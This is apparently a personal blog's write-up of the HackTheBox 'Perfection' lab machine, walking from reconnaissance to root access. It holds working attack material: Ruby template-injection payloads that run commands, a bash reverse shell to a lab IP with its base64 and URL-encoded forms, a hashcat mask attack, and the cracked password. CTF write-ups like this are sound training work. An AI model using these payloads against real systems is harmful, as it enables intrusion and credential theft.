<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Perfection | Perplex blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Perfection</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-07-19T03:39:25.000Z" id="date"> 2024-07-19</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-09-21T17:07:08.749Z" id="updated"> 2024-09-21</time></div></span></div></div><hr><div id="post-content"><p>Startign with nmap </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/kx982jejvm51n9uaw31ou/Pasted-image-20240428172105.png?rlkey=yyntjx1bnkhj9j4cw81208jza&st=ltd2oesi&dl=0'><img src="https://dl.dropbox.com/scl/fi/kx982jejvm51n9uaw31ou/Pasted-image-20240428172105.png?rlkey=yyntjx1bnkhj9j4cw81208jza&st=ltd2oesi&dl=0" alt="perfection 1"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/07pr7iebbt11f1bzlelc0/Pasted-image-20240428172547.png?rlkey=6boj54ev711y8q6x8fapcz3zj&st=t1hgi5xr&dl=0'><img src="https://dl.dropbox.com/scl/fi/07pr7iebbt11f1bzlelc0/Pasted-image-20240428172547.png?rlkey=6boj54ev711y8q6x8fapcz3zj&st=t1hgi5xr&dl=0" alt="perfection 2"></p>
<p>the website dashboard</p>
<p>checked the wappalyzer to find the technologies website is using but couldn’t find any<br>I tried directory fuzzing </p>
<p>Found this at the bottom of the website </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/4h7qzrzgdij4y2mwggn6d/Pasted-image-20240428172356.png?rlkey=h55s17ycmae2gj42q3fis4qlf&st=v7skct6p&dl=0'><img src="https://dl.dropbox.com/scl/fi/4h7qzrzgdij4y2mwggn6d/Pasted-image-20240428172356.png?rlkey=h55s17ycmae2gj42q3fis4qlf&st=v7skct6p&dl=0" alt="perfection 2"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/eosiqi38dyjraggin3hko/Pasted-image-20240428172442.png?rlkey=wc4xvjbx8rcus2ryp833h2yxk&st=onml3qmn&dl=0'><img src="https://dl.dropbox.com/scl/fi/eosiqi38dyjraggin3hko/Pasted-image-20240428172442.png?rlkey=wc4xvjbx8rcus2ryp833h2yxk&st=onml3qmn&dl=0" alt="perfection 3"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/n23s7rj4ljwibar8y34q6/Pasted-image-20240428172517.png?rlkey=p98x6u6apxkdbk6r4gzrgitwq&st=q1fa4xj7&dl=0'><img src="https://dl.dropbox.com/scl/fi/n23s7rj4ljwibar8y34q6/Pasted-image-20240428172517.png?rlkey=p98x6u6apxkdbk6r4gzrgitwq&st=q1fa4xj7&dl=0" alt="perfection 4"></p>
<p>we got another info that susan is sysadmin </p>
<p>we can see this in the about us and there might me a vulnerability on secure coding</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/8czuqbffm3m6ybblxlyp2/Pasted-image-20240428172611.png?rlkey=mlz0ojlkmoxkm2bj14u40di30&st=wjmf3l0j&dl=0'><img src="https://dl.dropbox.com/scl/fi/8czuqbffm3m6ybblxlyp2/Pasted-image-20240428172611.png?rlkey=mlz0ojlkmoxkm2bj14u40di30&st=wjmf3l0j&dl=0" alt="perfection 5"></p>
<p>there is a input field in the website , there might be a input validation vulnerbility</p>
<p>let’s do some rearch on the technologies the website is using WEBrick </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/ybz3os28u7dpuczy6lb4u/Pasted-image-20240428172643.png?rlkey=qcxrlcqbj5zal9b1tra5c3oj8&st=k1roabx6&dl=0'><img src="https://dl.dropbox.com/scl/fi/ybz3os28u7dpuczy6lb4u/Pasted-image-20240428172643.png?rlkey=qcxrlcqbj5zal9b1tra5c3oj8&st=k1roabx6&dl=0" alt="perfection 6"></p>
<p>but there is no information about vulnerbilities</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/vmner2o0vp56ovlx168oa/Pasted-image-20240428172712.png?rlkey=p5xq5p78wqtkzgri697dyvuxi&st=5drybtfk&dl=0'><img src="https://dl.dropbox.com/scl/fi/vmner2o0vp56ovlx168oa/Pasted-image-20240428172712.png?rlkey=p5xq5p78wqtkzgri697dyvuxi&st=5drybtfk&dl=0" alt="perfection 7"></p>
<p>the above is the robots.txt file we got something intresting </p>
<p>now we’ve gatherd information available in the website the next part will be testing the inputs</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/bsa478pi15jegiqdmoh4i/Pasted-image-20240428172824.png?rlkey=aqwa3tctjgrjmq48vga5r36i9&st=d4iglepj&dl=0'><img src="https://dl.dropbox.com/scl/fi/bsa478pi15jegiqdmoh4i/Pasted-image-20240428172824.png?rlkey=aqwa3tctjgrjmq48vga5r36i9&st=d4iglepj&dl=0" alt="perfection 8"></p>
<p>i did burpsuite scan to get more information about the vulnerbilities and the results are </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/eatb1xyitnx8si3b4s0p1/Pasted-image-20240428172841.png?rlkey=k6mlz4rdrs220x0049xx7xr12&st=0gebdusd&dl=0'><img src="https://dl.dropbox.com/scl/fi/eatb1xyitnx8si3b4s0p1/Pasted-image-20240428172841.png?rlkey=k6mlz4rdrs220x0049xx7xr12&st=0gebdusd&dl=0" alt="perfection 9"><br>to know how to perform a scan in burpsuite refer to [[scanning with burp scanner]]<br>so i confirmed that there is a way to bypass the input in the calculator</p>
<p>after adding single ‘  i got this result </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/n5gokptftk1ng998x3prj/Pasted-image-20240428173049.png?rlkey=1eiijyj3hgvbgd5m8pfuamfeq&st=tvc4gir2&dl=0'><img src="https://dl.dropbox.com/scl/fi/n5gokptftk1ng998x3prj/Pasted-image-20240428173049.png?rlkey=1eiijyj3hgvbgd5m8pfuamfeq&st=tvc4gir2&dl=0" alt="perfection 10"></p>
<p>after bit of research i came to know that it is a SSTI vulnerbility (server side template injection)<br>refer [[SSTI vulnerbility]] </p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection">https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection</a></p>
<p>search for ruby payloads in this website</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/0noe8981v7fw3rd4b8p00/Pasted-image-20240428173117.png?rlkey=aypy87w1a2yzbvo5v7gr7l4jk&st=mvc5795e&dl=0'><img src="https://dl.dropbox.com/scl/fi/0noe8981v7fw3rd4b8p00/Pasted-image-20240428173117.png?rlkey=aypy87w1a2yzbvo5v7gr7l4jk&st=mvc5795e&dl=0" alt="perfection 11"></p>
<p>let’s try some payloads and see what happens</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/7mfd8koua6ont36yyx39x/Pasted-image-20240428173215.png?rlkey=7o5e94a8vauv3qsuvcfgf4e6a&st=zhcwz6to&dl=0'><img src="https://dl.dropbox.com/scl/fi/7mfd8koua6ont36yyx39x/Pasted-image-20240428173215.png?rlkey=7o5e94a8vauv3qsuvcfgf4e6a&st=zhcwz6to&dl=0" alt="perfection 12"></p>
<p>we’ve got same result let’s keep trying<br>to encode select the characters and do ctrl+u to do url encoding</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/58yrzotidpsj41pym9yvn/Pasted-image-20240428173655.png?rlkey=ai1mzgkwjscdhzxqgktcied94&st=1sfko5bl&dl=0'><img src="https://dl.dropbox.com/scl/fi/58yrzotidpsj41pym9yvn/Pasted-image-20240428173655.png?rlkey=ai1mzgkwjscdhzxqgktcied94&st=1sfko5bl&dl=0" alt="perfection 13"></p>
<p>i’ve multiplied 7* 7 and i got the result 49 so &lt;%&#x3D; 7* 7 %&gt; payload works </p>
<p>now let’s add a linux command to thi payload to see if it works </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/gktzqa2p8zzlrqiqt83hy/Pasted-image-20240428173754.png?rlkey=b8r96umkvvl9k3o82kjaxuqfb&st=4u84j1pi&dl=0'><img src="https://dl.dropbox.com/scl/fi/gktzqa2p8zzlrqiqt83hy/Pasted-image-20240428173754.png?rlkey=b8r96umkvvl9k3o82kjaxuqfb&st=4u84j1pi&dl=0" alt="perfection 14"></p>
<p>we got susan as the username if we used whoami comamnd here</p>
<p>let’s do ls and pwd to knwo the direcotries and present directory<br>to execute commands use  &#96; ‘these </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/yx5332o9f22rzlh9tlbxv/Pasted-image-20240428173826.png?rlkey=s9mtnv3oacnt8lrjw0c2c38q1&st=y0nmi8am&dl=0'><img src="https://dl.dropbox.com/scl/fi/yx5332o9f22rzlh9tlbxv/Pasted-image-20240428173826.png?rlkey=s9mtnv3oacnt8lrjw0c2c38q1&st=y0nmi8am&dl=0" alt="perfection 15"></p>
<p>we got some details</p>
<p>using revshells.com website i created a python payload and gave me shell access</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/o6qwugbfs5hyeaw5frj3p/Pasted-image-20240428173912.png?rlkey=xrqe4lgyeix89ep6zr7elgmdy&st=qt0bvjwk&dl=0'><img src="https://dl.dropbox.com/scl/fi/o6qwugbfs5hyeaw5frj3p/Pasted-image-20240428173912.png?rlkey=xrqe4lgyeix89ep6zr7elgmdy&st=qt0bvjwk&dl=0" alt="perfection 16"></p>
<p>We can generate payload manually on our terminal refer to [[#Generate Payload]]</p>
<p class='item-img' data-src='https://www.dropbox.com/scl/fi/o5bqluapks7zzdxdh3zuo/Pasted-image-20240428174443.png?rlkey=sqqkdafl6aqwbca7xsqrzwpb5&st=1rbq7jxa&dl=0'><img src="https://www.dropbox.com/scl/fi/o5bqluapks7zzdxdh3zuo/Pasted-image-20240428174443.png?rlkey=sqqkdafl6aqwbca7xsqrzwpb5&st=1rbq7jxa&dl=0" alt="perfection 18"></p>
<p>to get neat terminal we did<br>python3 -c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;bash”)’</p>
<p>we got the user flag now</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/tlmq6axnw80401uplnhst/Pasted-image-20240428174552.png?rlkey=5cxamrau1kz1b8xhpxrwk38sn&st=jzy2ixjd&dl=0'><img src="https://dl.dropbox.com/scl/fi/tlmq6axnw80401uplnhst/Pasted-image-20240428174552.png?rlkey=5cxamrau1kz1b8xhpxrwk38sn&st=jzy2ixjd&dl=0" alt="perfection 19"></p>
<p>cracking password with hash cat  using this command</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">hashcat -m 1400 &lt;hashhere&gt; -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/cs33msyywl4i2377zddqc/Pasted-image-20240428174743.png?rlkey=ccbuu45rbmb431apwv8awvvz4&st=x3fea1yl&dl=0'><img src="https://dl.dropbox.com/scl/fi/cs33msyywl4i2377zddqc/Pasted-image-20240428174743.png?rlkey=ccbuu45rbmb431apwv8awvvz4&st=x3fea1yl&dl=0" alt="perfection 20"></p>
<p>refer [[Hashcat]] to learn using hashacat</p>
<p>after sometime we finally cracked hashcat password<br>susan_nasus_413759210</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/o10opz8t9du2ajbn8fvu0/Pasted-image-20240428174954.png?rlkey=ih1dij52arygvzdfp11hnlp03&st=h9qyj53d&dl=0'><img src="https://dl.dropbox.com/scl/fi/o10opz8t9du2ajbn8fvu0/Pasted-image-20240428174954.png?rlkey=ih1dij52arygvzdfp11hnlp03&st=h9qyj53d&dl=0" alt="perfection 21"></p>
<p>using sudo bash we switched to root user and got root flag<br class='item-img' data-src='https://dl.dropbox.com/scl/fi/sfqcyp74fen4scv6gjfza/Pasted-image-20240428175215.png?rlkey=mv1m9qgrto16itn1oeblvw4wm&st=u5iwnpjp&dl=0'><img src="https://dl.dropbox.com/scl/fi/sfqcyp74fen4scv6gjfza/Pasted-image-20240428175215.png?rlkey=mv1m9qgrto16itn1oeblvw4wm&st=u5iwnpjp&dl=0" alt="perfection 22"></p>
<h3 id="Generate-Payload"><a href="#Generate-Payload" class="headerlink" title="Generate Payload"></a>Generate Payload</h3><p>Using hURL to encode and decode payloads demonstrates how we can mess around with data to take advantage of weaknesses in web applications.</p>
<p>Specifically, the payload we’re making for the Weighted Grade Calculator app is made to run a reverse shell command. This way, we can exploit any possible vulnerabilities that let us run code on the server’s side.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">┌──(kali㉿kali)-[~]<br>└─$ hURL -B &quot;bash -i &gt;&amp; /dev/tcp/10.10.14.213/7373 0&gt;&amp;1&quot;<br><br>Original       :: bash -i &gt;&amp; /dev/tcp/10.10.14.213/7373 0&gt;&amp;1                                                                                                                                                     <br>base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx<br><br>┌──(kali㉿kali)-[~]<br>└─$ hURL -U &quot;YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx&quot;<br><br>Original    :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx                                                                                                                                          <br>URL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">category1=a%0A&lt;%25%3Dsystem(&quot;ping+-c1+$myIP&quot;);%25&gt;<br></code></pre></td></tr></table></figure>
<p>the above is the another paylaod from the write up </p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2024/07/19/HackTheBox/Linux/keeper/">← Next Keeper</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2024/07/19/HackTheBox/Linux/Builder/">Builder Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://dl.dropbox.com/scl/fi/fqvt7r79helfg6xr2ezg0/law-removebg-preview.png?rlkey=d897y2x6cos2hcasqagui6wy9&amp;st=itvktys9&amp;dl=0" alt="Logo"></a><h1 id="Dr"><a href="/">Santhosh vardan</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/darkrider00"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" href="mailto:santoshvardan007@gmail.com"><i class="fa fa-envelope" alt="E-Mail"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/perplex_007"><i class="fa-brands fa-twitter" alt="Twitter"></i></a><a class="social" target="_blank" rel="noopener" href="https://www.linkedin.com/in/perplex007/"><i class="fab fa-linkedin" alt="Linkedin"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Generate-Payload"><span class="toc-number">1.</span> <span class="toc-text">Generate Payload</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>